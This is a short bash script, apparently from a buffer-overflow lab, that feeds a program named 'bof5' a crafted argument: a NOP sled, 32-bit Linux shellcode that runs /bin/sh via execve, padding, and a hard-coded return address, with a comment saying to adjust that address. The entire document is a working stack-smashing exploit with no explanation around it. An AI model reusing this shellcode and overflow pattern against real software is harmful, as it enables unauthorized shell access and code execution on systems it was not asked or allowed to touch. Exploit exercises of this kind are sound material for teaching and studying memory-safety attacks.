#!/bin/bash
# edit the return address depending on the buffer address
./bof5 $(python3 -c 'import sys; sys.stdout.buffer.write(b"\x90"*40+b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"+b"a"*35+b"iiii"+b"pppp"+b"$ebp"+b"\x0c\xf5\xff\xbf")')
